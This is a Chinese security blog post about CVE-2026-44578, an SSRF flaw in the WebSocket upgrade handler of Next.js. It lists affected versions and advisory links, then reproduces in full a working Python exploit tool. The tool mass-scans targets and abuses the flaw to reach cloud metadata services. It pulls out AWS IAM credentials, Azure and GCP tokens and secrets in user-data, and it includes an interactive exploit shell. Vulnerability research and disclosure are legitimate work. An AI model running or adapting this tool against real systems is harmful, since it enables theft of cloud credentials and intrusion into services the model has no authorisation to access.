首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >CVE-2026-44578|Next.js WebSocket服务端请求伪造(SSRF)漏洞(POC)

CVE-2026-44578|Next.js WebSocket服务端请求伪造(SSRF)漏洞(POC)

作者头像
信安百科
发布2026-06-01 16:01:13
发布2026-06-01 16:01:13
310
举报
文章被收录于专栏:信安百科信安百科

0x00 前言

Next.js是一个用于构建全栈Web应用程序的React框架,由Vercel开发并维护。它提供了服务器端渲染(SSR)、静态站点生成(SSG)、API路由、图像优化等强大功能,极大地简化了现代Web应用的开发流程。

Next.js以其出色的开发体验和性能优化能力,已成为当前最受欢迎的React框架之一,被全球数百万开发者用于构建各类Web应用。

0x01 漏洞描述

该漏洞存在于Next.js的WebSocket升级处理程序中。自托管的应用程序使用内置的Node.js服务器时,可能会受到服务端请求伪造(SSRF)攻击。

WebSocket升级处理程序缺乏与普通HTTP请求相同的安全检查,导致攻击者可以通过发送绝对形式的URI来绕过路由验证,直接触发代理请求。

攻击者可以通过构造特殊的WebSocket升级请求,使服务器代理请求到任意内部或外部目标,这可能会暴露内部服务或云元数据端点。

0x02 CVE编号

CVE-2026-44578

0x03 影响版本

代码语言:javascript
复制
Next.js 13.4.13 至 15.5.15
Next.js 16.0.0 至 16.2.4

0x04 漏洞详情

POC:

https://github.com/ynsmroztas/nextssrf

代码语言:javascript
复制
#!/usr/bin/env python3
"""
╔══════════════════════════════════════════════════════════════╗
║         NextSSRF — CVE-2026-44578 Scanner & Exploit          ║
║   Next.js WebSocket Upgrade Handler SSRF                     ║
║   Affected: 13.4.13 → 15.5.15 | 16.0.0 → 16.2.4             ║
║   Fixed:    15.5.16 / 16.2.5 (self-hosted only)              ║
║         @mitsec / ynsmroztas — Bug Bounty Tooling            ║
╚══════════════════════════════════════════════════════════════╝

Mechanism:
  The // in http:// triggers normalizeRepeatedSlashes early-exit
  setting finished:true + statusCode:308. The vulnerable WebSocket
  upgrade handler ignores both — only checks parsedUrl.protocol —
  and calls proxyRequest → GET to attacker-controlled host:80.

Limitations: GET only | Port 80 only | IMDSv2 not exploitable
             Vercel-hosted NOT affected | nginx proxy blocks it

Usage:
  # Scan single target
  python3 nextssrf.py -t https://target.com

  # Pipeline (subfinder | httpx | nextssrf)
  cat targets.txt | python3 nextssrf.py --pipe --threads 20

  # Interactive exploit shell
  python3 nextssrf.py -t https://target.com --interactive

  # AWS credential extraction chain
  python3 nextssrf.py -t https://target.com --cloud aws

  # Custom internal target
  python3 nextssrf.py -t https://target.com --ssrf http://internal-api/admin

  # Auto mode: detect cloud + full exploit
  python3 nextssrf.py -t https://target.com --auto

  # Mass scan with output
  cat hosts.txt | python3 nextssrf.py --pipe --threads 20 -o results.jsonl

Exit codes: 0=clean  1=vuln(no exploit)  2=ssrf confirmed
"""

import argparse, json, re, signal, socket, ssl, sys, threading, time
import urllib.parse, urllib.error, urllib.request
from datetime import datetime
from queue import Empty, Queue

# ── ANSI ────────────────────────────────────────────────────────
R="\033[91m";G="\033[92m";Y="\033[93m";C="\033[96m";W="\033[97m"
DIM="\033[2m";RESET="\033[0m";BOLD="\033[1m";M="\033[95m"

WS_KEY = "dGhlIHNhbXBsZSBub25jZQ=="
UA     = ("Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 "
          "(KHTML, like Gecko) Chrome/148.0.0.0 Mobile Safari/537.36")

CTX = ssl.create_default_context()
CTX.check_hostname = False
CTX.verify_mode    = ssl.CERT_NONE

def banner():
    print(f"""
{C}╔══════════════════════════════════════════════════════════════╗
║{W}        NextSSRF — CVE-2026-44578 Scanner & Exploit           {C}║
║{DIM}        Next.js WebSocket Upgrade Handler SSRF                {C}║
║{DIM}        Affected: 13.4.13-15.5.15 | Fixed: 15.5.16/16.2.5    {C}║
║{DIM}        @mitsec / ynsmroztas                                  {C}║
╚══════════════════════════════════════════════════════════════╝{RESET}
""")

def info(m):  print(f"{G}[+]{RESET} {m}")
def warn(m):  print(f"{Y}[!]{RESET} {m}")
def err(m):   print(f"{R}[-]{RESET} {m}")
def step(m):  print(f"{C}[>]{RESET} {BOLD}{m}{RESET}")
def dim(m):   print(f"  {DIM}{m}{RESET}")
def hit(m):   print(f"\n{R}{'█'*58}{RESET}\n{R}{BOLD}  {m}{RESET}\n{R}{'█'*58}{RESET}\n")

def sc(code):
    if code == 200: return G
    if code in (301,302): return Y
    if code in (401,403): return Y
    if code >= 500: return R
    return DIM

# ── Core exploit ─────────────────────────────────────────────

def ssrf(host, port, use_ssl, ssrf_url, timeout=10):
    """Send CVE-2026-44578 WebSocket upgrade exploit request."""
    raw = (f"GET {ssrf_url} HTTP/1.1\r\n"
           f"Host: {host}\r\n"
           f"Connection: Upgrade\r\n"
           f"Upgrade: websocket\r\n"
           f"Sec-WebSocket-Version: 13\r\n"
           f"Sec-WebSocket-Key: {WS_KEY}\r\n"
           f"User-Agent: {UA}\r\n\r\n").encode()
    try:
        s = socket.create_connection((host, port), timeout=timeout)
        if use_ssl:
            s = CTX.wrap_socket(s, server_hostname=host)
        s.sendall(raw)
        s.settimeout(timeout)
        buf = b""
        try:
            while len(buf) < 131072:
                chunk = s.recv(8192)
                if not chunk: break
                buf += chunk
        except socket.timeout: pass
        s.close()
        resp = buf.decode(errors="replace")
        m = re.match(r'HTTP/[\d.]+ (\d+)', resp)
        code = int(m.group(1)) if m else 0
        parts = resp.split("\r\n\r\n", 1)
        body = parts[1] if len(parts) > 1 else resp
        return code, body
    except Exception as e:
        return 0, str(e)

def parse_target(url):
    p = urllib.parse.urlparse(url)
    return p.hostname, p.port or (443 if p.scheme=="https" else 80), p.scheme=="https"

def is_nextjs(body):
    return any(x in body for x in ["/_next/static","/_next/chunks",'charSet="utf-8"'])

# ── Version detection ─────────────────────────────────────────

VULN_RANGES = [((13,4,13),(15,5,15)), ((16,0,0),(16,2,4))]

def parse_ver(s):
    m = re.search(r'(\d+)\.(\d+)\.(\d+)', s or "")
    return tuple(int(x) for x in m.groups()) if m else None

def is_vulnerable(ver):
    if not ver: return None
    for lo, hi in VULN_RANGES:
        if lo <= ver <= hi: return True
    return False

def detect_nextjs(base, timeout=8):
    result = {"nextjs": False, "version": None, "version_str": None, "vulnerable": None}
    for path in ["/_next/static/", "/", "/api/health"]:
        try:
            req = urllib.request.Request(base + path,
                headers={"User-Agent": UA, "Accept": "*/*"})
            with urllib.request.urlopen(req, timeout=timeout, context=CTX) as r:
                body = r.read(4096).decode(errors="replace")
                hdrs = dict(r.headers)
                srv  = hdrs.get("X-Powered-By","") + hdrs.get("x-powered-by","")
                if path == "/_next/static/" or "next.js" in srv.lower():
                    result["nextjs"] = True
                m = re.search(r'["\']?next["\']?\s*:\s*["\'](\d+\.\d+\.\d+)["\']', body)
                if not m:
                    m = re.search(r'Next\.js[/ ]v?(\d+\.\d+\.\d+)', body)
                if m:
                    ver = parse_ver(m.group(1))
                    result.update(version=ver, version_str=m.group(1),
                                  nextjs=True, vulnerable=is_vulnerable(ver))
                    break
        except Exception: pass
    return result

# ── Cloud detection ───────────────────────────────────────────

CLOUD_PROBES = {
    "aws":    [("http://169.254.169.254/latest/meta-data/",
                ["ami-id","instance-id","hostname","iam/","block-device-mapping"])],
    "azure":  [("http://169.254.169.254/metadata/instance?api-version=2021-02-01",
                ["azEnvironment","subscriptionId","vmId"])],
    "gcp":    [("http://metadata.google.internal/computeMetadata/v1/",
                ["instance/","project/"])],
    "do":     [("http://169.254.169.254/metadata/v1.json",
                ["droplet_id","hostname","interfaces"])],
    "oracle": [("http://169.254.169.254/opc/v1/instance/",
                ["compartmentId","displayName"])],
}

def detect_cloud(host, port, use_ssl, timeout=8):
    step("Detecting cloud provider...")
    found = {}
    for provider, probes in CLOUD_PROBES.items():
        for url, hints in probes:
            code, body = ssrf(host, port, use_ssl, url, timeout)
            if code == 200 and not is_nextjs(body):
                hits = [h for h in hints if h.lower() in body.lower()]
                if hits:
                    found[provider] = {"url": url, "hints": hits}
                    info(f"{G}{provider.upper()}{RESET} — matched: {hits}")
                    break
            time.sleep(0.05)
    if not found:
        dim("No cloud metadata detected")
    return found

# ── AWS exploit chain ─────────────────────────────────────────

def render(body, max_lines=30):
    try:
        obj = json.loads(body)
        out = []
        for line in json.dumps(obj, indent=2).splitlines()[:max_lines]:
            k = line.split('":')[0].strip().strip('"').lower()
            color = R+BOLD if any(s in k for s in
                    ['key','secret','token','password','access','cred']) else ""
            out.append(f"  {color}{line}{RESET if color else ''}")
        return "\n".join(out)
    except Exception:
        return "\n".join(f"  {l}" for l in body.strip().splitlines()[:max_lines])

def hit_box(title, data):
    print(f"\n{R}{'▓'*60}{RESET}")
    print(f"{R}{BOLD}  🎯 {title}{RESET}")
    print(f"{R}{'▓'*60}{RESET}")
    for k, v in data.items():
        print(f"  {Y}{k:<22}{RESET}: {G}{BOLD}{str(v)[:80]}{RESET}")
    print(f"{R}{'▓'*60}{RESET}\n")

def exploit_aws(host, port, use_ssl, timeout=8):
    results = {}
    print(f"\n{Y}{'═'*60}{RESET}")
    print(f"{BOLD}  AWS IMDSv1 Exploitation Chain{RESET}")
    print(f"{Y}{'═'*60}{RESET}")

    # Step 1: Instance info
    print(f"\n{C}[1/3]{RESET} Instance Information")
    for name, url in [
        ("Instance ID",   "http://169.254.169.254/latest/meta-data/instance-id"),
        ("Instance Type", "http://169.254.169.254/latest/meta-data/instance-type"),
        ("Hostname",      "http://169.254.169.254/latest/meta-data/hostname"),
        ("Local IPv4",    "http://169.254.169.254/latest/meta-data/local-ipv4"),
        ("Public IPv4",   "http://169.254.169.254/latest/meta-data/public-ipv4"),
        ("AMI ID",        "http://169.254.169.254/latest/meta-data/ami-id"),
        ("Region",        "http://169.254.169.254/latest/meta-data/placement/region"),
        ("AZ",            "http://169.254.169.254/latest/meta-data/placement/availability-zone"),
        ("Account ID",    "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/info"),
    ]:
        code, body = ssrf(host, port, use_ssl, url, timeout)
        val = body.strip()[:100] if (code==200 and not is_nextjs(body)) else None
        print(f"  {sc(code)}[{code}]{RESET} {name:<20}: "
              f"{G if val else DIM}{val or '(not available)'}{RESET}")
        if val: results[name] = val
        time.sleep(0.05)

    # Step 2: IAM role
    print(f"\n{C}[2/3]{RESET} IAM Role Discovery")
    code, body = ssrf(host, port, use_ssl,
                     "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
                     timeout)
    role = None
    if code == 200 and not is_nextjs(body) and body.strip():
        role = body.strip().splitlines()[0].strip()
        print(f"  {G}✓ IAM Role found:{RESET} {R}{BOLD}{role}{RESET}")
        results["iam_role"] = role
    else:
        # Fallback: parse from iam/info ARN
        code2, body2 = ssrf(host, port, use_ssl,
                           "http://169.254.169.254/latest/meta-data/iam/info", timeout)
        if code2 == 200 and not is_nextjs(body2):
            try:
                arn = json.loads(body2).get("InstanceProfileArn","")
                if arn:
                    role = arn.split("/")[-1]
                    print(f"  {G}✓ Role from ARN:{RESET} {R}{BOLD}{role}{RESET}")
                    results["iam_role"] = role
            except Exception: pass
        if not role:
            print(f"  {DIM}No IAM role attached{RESET}")

    # Step 3: Credentials
    print(f"\n{C}[3/3]{RESET} Credential Extraction")
    if role:
        code, body = ssrf(host, port, use_ssl,
            f"http://169.254.169.254/latest/meta-data/iam/security-credentials/{role}",
            timeout)
        if code == 200 and not is_nextjs(body):
            try:
                creds = json.loads(body)
                ak = creds.get("AccessKeyId","")
                sk = creds.get("SecretAccessKey","")
                tok = creds.get("Token","")
                if ak:
                    hit_box("AWS CREDENTIALS EXFILTRATED!", {
                        "Role":              role,
                        "AccessKeyId":       ak,
                        "SecretAccessKey":   sk[:8]+"..."*(len(sk)>8),
                        "Token (first 40)":  tok[:40]+"..." if tok else "N/A",
                        "Expiration":        creds.get("Expiration",""),
                        "Type":              creds.get("Type",""),
                    })
                    results["credentials"] = creds
                    results["verify_cmd"] = (
                        f"AWS_ACCESS_KEY_ID={ak} "
                        f"AWS_SECRET_ACCESS_KEY={sk} "
                        f"AWS_SESSION_TOKEN={tok} "
                        f"aws sts get-caller-identity"
                    )
                    print(f"{Y}Verify:{RESET}")
                    print(f"  {DIM}{results['verify_cmd'][:120]}{RESET}")
                else:
                    print(f"  {render(body, 10)}")
            except json.JSONDecodeError:
                print(f"  {body[:300]}")
        else:
            print(f"  {sc(code)}[{code}]{RESET} No credentials (role may lack permissions)")
    else:
        print(f"  {DIM}Skipped — no role{RESET}")

    # User-data bonus
    print(f"\n{C}[+]{RESET} User-Data Check")
    code, body = ssrf(host, port, use_ssl,
                     "http://169.254.169.254/latest/user-data", timeout)
    if code == 200 and not is_nextjs(body) and body.strip():
        secrets = re.findall(
            r'(?:password|secret|key|token)[=:]\s*\S+', body, re.I)
        if secrets:
            hit_box("SECRETS IN USER-DATA", {"found": str(secrets[:5])})
        else:
            info(f"User-data present ({len(body)}b) — no obvious secrets")
            print(f"  {DIM}{body[:200]}{RESET}")
        results["user_data"] = body[:500]
    else:
        dim(f"No user-data (code={code})")

    return results

def exploit_azure(host, port, use_ssl, timeout=8):
    results = {}
    print(f"\n{Y}{'═'*60}{RESET}")
    print(f"{BOLD}  Azure IMDS Exploitation Chain{RESET}")
    print(f"{Y}{'═'*60}{RESET}")

    code, body = ssrf(host, port, use_ssl,
        "http://169.254.169.254/metadata/instance?api-version=2021-02-01", timeout)
    if code == 200 and not is_nextjs(body):
        try:
            data = json.loads(body)
            compute = data.get("compute",{})
            info("Azure instance info:")
            for k in ["vmId","name","resourceGroupName","subscriptionId","location","vmSize"]:
                v = compute.get(k,"")
                if v:
                    print(f"  {Y}{k:<25}{RESET}: {v}")
                    results[k] = v
        except Exception:
            print(f"  {body[:300]}")

    code, body = ssrf(host, port, use_ssl,
        "http://169.254.169.254/metadata/identity/oauth2/token"
        "?api-version=2018-02-01&resource=https://management.azure.com/", timeout)
    if code == 200 and not is_nextjs(body):
        try:
            td = json.loads(body)
            tok = td.get("access_token","")
            if tok:
                hit_box("AZURE MANAGED IDENTITY TOKEN!", {
                    "access_token (50)": tok[:50]+"...",
                    "token_type":        td.get("token_type",""),
                    "expires_in":        td.get("expires_in",""),
                    "resource":          td.get("resource",""),
                })
                results["azure_token"] = tok
        except Exception:
            pass
    return results

# ── Interactive shell ─────────────────────────────────────────

def interactive(target_url, timeout=10):
    host, port, use_ssl = parse_target(target_url)
    session = {"target": target_url, "results": {}, "history": []}

    print(f"""
{C}╔══════════════════════════════════════════════════════════╗
║{W}  NextSSRF — Interactive Exploit Shell                   {C}║
║{DIM}  Target : {W}{host}:{port}{DIM} {'(SSL)' if use_ssl else '(plain)'}{'':>20}{C}║
║{DIM}  CVE    : CVE-2026-44578                               {C}║
╚══════════════════════════════════════════════════════════╝{RESET}
{DIM}  help | cloud | scan | aws | azure | url <http://...>
  get <N> | list | history | save | quit{RESET}
""")

    def do(url):
        print(f"\n  {DIM}→ {url}{RESET}")
        code, body = ssrf(host, port, use_ssl, url, timeout)
        html = is_nextjs(body)
        print(f"  {sc(code)}[HTTP {code}]{RESET} ({len(body)}b)"
              + (f" {Y}[Next.js response — not SSRF]{RESET}" if html else ""))
        if not html and body.strip():
            print(render(body))
        session["history"].append({"url": url, "code": code})
        return code, body

    IMDS = [
        "http://169.254.169.254/latest/meta-data/",
        "http://169.254.169.254/latest/meta-data/ami-id",
        "http://169.254.169.254/latest/meta-data/hostname",
        "http://169.254.169.254/latest/meta-data/instance-type",
        "http://169.254.169.254/latest/meta-data/iam/info",
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "http://169.254.169.254/latest/user-data",
        "http://169.254.169.254/latest/meta-data/placement/region",
        "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/info",
        "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
    ]

    while True:
        try:
            cmd = input(f"\n{M}ssrf{DIM}({host[:28]}){RESET}> ").strip()
        except (EOFError, KeyboardInterrupt):
            break
        if not cmd: continue

        if cmd in ("q","quit","exit"): break

        elif cmd == "help":
            print(f"""
{C}  cloud{RESET}          — detect cloud (AWS/Azure/GCP/DO)
{C}  scan{RESET}           — cloud detect + auto exploit
{C}  aws{RESET}            — full AWS credential chain
{C}  azure{RESET}          — Azure managed identity
{C}  url <http://...>{RESET} — custom SSRF (port 80 only)
{C}  get <0-9>{RESET}      — IMDS target by index
{C}  list{RESET}           — show all IMDS endpoints
{C}  history{RESET}        — request history
{C}  save{RESET}           — export session JSON
{C}  quit{RESET}           — exit""")

        elif cmd == "cloud":
            clouds = detect_cloud(host, port, use_ssl, timeout)
            session["cloud"] = list(clouds.keys())
            if "aws" in clouds:
                print(f"  {Y}→ Run 'aws' for credential extraction{RESET}")

        elif cmd == "aws":
            r = exploit_aws(host, port, use_ssl, timeout)
            session["results"].update(r)

        elif cmd == "azure":
            r = exploit_azure(host, port, use_ssl, timeout)
            session["results"].update(r)

        elif cmd == "scan":
            clouds = detect_cloud(host, port, use_ssl, timeout)
            if "aws" in clouds:
                r = exploit_aws(host, port, use_ssl, timeout)
                session["results"].update(r)
            elif "azure" in clouds:
                r = exploit_azure(host, port, use_ssl, timeout)
                session["results"].update(r)
            else:
                for u in ["http://localhost/","http://127.0.0.1/",
                          "http://kubernetes.default.svc/"]:
                    do(u)

        elif cmd.startswith("url "):
            url = cmd[4:].strip()
            if not url.startswith("http://"):
                warn("Port 80 only — use http://")
            else:
                do(url)

        elif cmd.startswith("get "):
            try:
                do(IMDS[int(cmd.split()[1])])
            except (IndexError, ValueError):
                warn("Use: get <0-9>. Type 'list' to see targets.")

        elif cmd == "list":
            print(f"\n{C}  IMDS Endpoints:{RESET}")
            for i, u in enumerate(IMDS):
                print(f"  {Y}[{i}]{RESET} {u}")

        elif cmd == "history":
            print(f"\n{C}  History ({len(session['history'])}):{RESET}")
            for h in session["history"][-20:]:
                print(f"  {sc(h['code'])}[{h['code']}]{RESET} {h['url']}")

        elif cmd == "save":
            ts = datetime.now().strftime("%Y%m%d_%H%M%S")
            fname = f"nextssrf_{host}_{ts}.json"
            with open(fname,"w") as f:
                json.dump(session, f, indent=2, default=str)
            info(f"Saved: {fname}")

        elif cmd.startswith("http://"):
            do(cmd)
        else:
            warn("Unknown command — type 'help'")

# ── Scanner ───────────────────────────────────────────────────

_lock = threading.Lock()
_results = []
_exit = 0

CLOUD_TARGETS = {
    "aws": [
        ("AWS IMDSv1 — meta-data",    "http://169.254.169.254/latest/meta-data/"),
        ("AWS IMDSv1 — hostname",     "http://169.254.169.254/latest/meta-data/hostname"),
        ("AWS IMDSv1 — iam/creds",    "http://169.254.169.254/latest/meta-data/iam/security-credentials/"),
        ("AWS IMDSv1 — user-data",    "http://169.254.169.254/latest/user-data"),
        ("AWS IMDSv1 — instance-id",  "http://169.254.169.254/latest/meta-data/instance-id"),
        ("AWS IMDSv1 — ami-id",       "http://169.254.169.254/latest/meta-data/ami-id"),
        ("AWS IMDSv1 — account",      "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/info"),
    ],
    "azure": [
        ("Azure IMDS — instance",     "http://169.254.169.254/metadata/instance?api-version=2021-02-01"),
        ("Azure IMDS — identity",     "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"),
    ],
    "gcp": [
        ("GCP Metadata — project",    "http://metadata.google.internal/computeMetadata/v1/project/project-id"),
        ("GCP Metadata — token",      "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"),
    ],
    "do": [
        ("DO Metadata",               "http://169.254.169.254/metadata/v1.json"),
    ],
    "oracle": [
        ("OCI Metadata",              "http://169.254.169.254/opc/v1/instance/"),
    ],
}

def scan(target, args):
    global _exit
    target = target.strip()
    if not target: return {}
    # Extract URL from httpx-style output
    target = target.split()[0]
    if not target.startswith("http"): target = "https://" + target

    dim(f"Detecting: {target}")
    det = detect_nextjs(target, args.timeout)
    vs  = det.get("version_str") or "unknown"
    vuln = det.get("vulnerable")

    if not det["nextjs"]:
        dim(f"Not Next.js: {target}")
        return {}

    vs_color = {True:R,False:G,None:Y}[vuln]
    vs_label = {True:"VULNERABLE",False:"PATCHED",None:"UNKNOWN"}[vuln]
    info(f"{W}{target}{RESET} — Next.js/{vs} — {vs_color}{vs_label}{RESET}")

    if vuln is False and not args.force:
        return {"target":target,"version":vs,"vulnerable":False,"ssrf_hits":[]}

    host, port, use_ssl = parse_target(target)
    result = {"target":target,"version":vs,"vulnerable":vuln,"ssrf_hits":[]}

    # Choose targets
    targets = []
    if args.ssrf:
        targets = [("Custom", args.ssrf)]
    else:
        cloud = args.cloud or "aws"
        if cloud == "all":
            for lst in CLOUD_TARGETS.values(): targets.extend(lst)
        else:
            targets = CLOUD_TARGETS.get(cloud, CLOUD_TARGETS["aws"])

    step(f"  Testing {len(targets)} SSRF targets → {target}")
    for desc, url in targets:
        dim(f"    → {url}")
        code, body = ssrf(host, port, use_ssl, url, args.timeout)
        time.sleep(0.05)

        html = is_nextjs(body)
        is_hit = False
        evidence = ""

        if "Failed to proxy http:/" in body:
            is_hit = True
            evidence = "Log fingerprint: vulnerable but IMDS unreachable"
        elif code == 200 and not html:
            imds_patterns = [
                r'ami-[a-f0-9]{8}', r'AccessKeyId',
                r'SecretAccessKey', r'AKIA[0-9A-Z]{16}',
                r'ip-\d+-\d+-\d+-\d+\.ec2\.internal',
                r'instance-id\ninstance-type',
                r'"accountId"', r'"subscriptionId"',
                r'droplet_id', r'compartmentId',
            ]
            if any(re.search(p, body) for p in imds_patterns):
                is_hit = True
                evidence = body[:600]
            elif len(body) < 2000 and "169.254.169.254" in url:
                is_hit = True
                evidence = body[:400]

        if re.search(r'AKIA[0-9A-Z]{16}|"AccessKeyId".*"SecretAccessKey"', body):
            is_hit = True
            evidence = body[:800]
            hit(f"AWS CREDENTIALS via {url}")

        if is_hit:
            hit(f"SSRF CONFIRMED — {desc}")
            print(f"  {Y}Target  :{RESET} {url}")
            print(f"  {Y}Status  :{RESET} {sc(code)}HTTP {code}{RESET}")
            if evidence and evidence != body[:400]:
                pass
            elif evidence:
                print(f"  {Y}Response:{RESET}\n{render(evidence, 15)}")
            result["ssrf_hits"].append({"desc":desc,"url":url,"status":code,"evidence":evidence})
            with _lock: _exit = max(_exit, 2)

    if result["ssrf_hits"] == [] and vuln:
        with _lock: _exit = max(_exit, 1)

    return result

def worker(q, args):
    while True:
        try: t = q.get(timeout=1)
        except Empty: break
        try:
            r = scan(t, args)
            if r:
                with _lock: _results.append(r)
        except Exception as e: err(f"{t}: {e}")
        finally: q.task_done()

def summary(results):
    vuln = [r for r in results if r.get("vulnerable")]
    hits = [r for r in results if r.get("ssrf_hits")]
    print(f"\n{C}{'═'*58}{RESET}")
    print(f"{BOLD}  NextSSRF — CVE-2026-44578 Summary{RESET}")
    print(f"{C}{'═'*58}{RESET}")
    print(f"  Scanned        : {len(results)}")
    print(f"  {R}Vulnerable     : {len(vuln)}{RESET}")
    print(f"  {R}SSRF Confirmed : {len(hits)}{RESET}")
    if hits:
        print(f"\n{R}[CONFIRMED SSRF]{RESET}")
        for r in hits:
            print(f"  {r['target']}")
            for h in r["ssrf_hits"][:3]:
                print(f"    {Y}→{RESET} {h['url']} (HTTP {h['status']})")

def main():
    global _exit
    p = argparse.ArgumentParser(prog="nextssrf",
        description="CVE-2026-44578 — Next.js SSRF @mitsec",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=__doc__.split("Usage:")[1] if "Usage:" in __doc__ else "")
    p.add_argument("-t","--target")
    p.add_argument("--pipe",    action="store_true", help="Read targets from stdin")
    p.add_argument("-f","--file",                    help="File with targets")
    p.add_argument("--threads", type=int, default=10)
    p.add_argument("--timeout", type=int, default=10)
    p.add_argument("--cloud",   choices=["aws","azure","gcp","do","oracle","all"],
                                default="aws")
    p.add_argument("--ssrf",    help="Custom SSRF URL (http:// only)")
    p.add_argument("--force",   action="store_true", help="Exploit even if version unknown")
    p.add_argument("--interactive", "-i", action="store_true", help="Interactive exploit shell")
    p.add_argument("--auto",    action="store_true", help="Auto: detect cloud + full exploit")
    p.add_argument("-o","--output",                  help="Output file (.json or .jsonl)")
    p.add_argument("--no-banner", action="store_true")
    args = p.parse_args()

    if not args.no_banner: banner()

    def _sig(s,f):
        warn("Interrupted"); summary(_results)
        if args.output: _save(args.output)
        sys.exit(_exit)
    signal.signal(signal.SIGINT, _sig)

    targets = []
    if args.target:  targets.append(args.target)
    if args.pipe:
        for l in sys.stdin:
            if l.strip(): targets.append(l.strip())
    if args.file:
        with open(args.file) as f:
            targets += [l.strip() for l in f if l.strip() and not l.startswith("#")]
    if not targets:
        err("No targets. Use -t, --pipe, or -f"); sys.exit(1)

    targets = [t if t.startswith("http") else "https://"+t for t in targets]

    # Interactive / auto (single target)
    if args.interactive or args.auto:
        if len(targets) != 1:
            err("Interactive/auto mode requires exactly one target (-t)")
            sys.exit(1)
        if args.auto:
            host, port, use_ssl = parse_target(targets[0])
            clouds = detect_cloud(host, port, use_ssl, args.timeout)
            if "aws" in clouds:    exploit_aws(host, port, use_ssl, args.timeout)
            elif "azure" in clouds: exploit_azure(host, port, use_ssl, args.timeout)
        else:
            interactive(targets[0], args.timeout)
        return

    # Scan mode
    if len(targets) == 1:
        r = scan(targets[0], args)
        if r: _results.append(r)
    else:
        step(f"Scanning {len(targets)} targets | threads={args.threads}")
        q = Queue()
        for t in targets: q.put(t)
        ts = [threading.Thread(target=worker, args=(q,args), daemon=True)
              for _ in range(min(args.threads, len(targets)))]
        for t in ts: t.start()
        try: q.join()
        except KeyboardInterrupt: _sig(None,None)

    summary(_results)
    if args.output: _save(args.output)
    sys.exit(_exit)

def _save(path):
    fmt = "json" if path.endswith(".json") else "jsonl"
    with open(path,"w") as f:
        if fmt == "json": json.dump(_results, f, indent=2, default=str)
        else:
            for r in _results: f.write(json.dumps(r, default=str)+"\n")
    info(f"Saved: {path}")

if __name__ == "__main__":
    main()

0x05 参考链接

https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r

https://github.com/vercel/next.js/commit/c4f69086

推荐阅读:

CVE-2025-55182|React/Next.js远程代码执行漏洞(POC)

CVE-2024-34351|Next.js框架存在SSRF漏洞

CVE-2026-46333|Linux内核ptrace本地权限提升漏洞(POC)

Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2026-05-30,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 信安百科 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x00 前言
  • 0x01 漏洞描述
  • 0x02 CVE编号
  • 0x03 影响版本
  • 0x04 漏洞详情
  • 0x05 参考链接
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档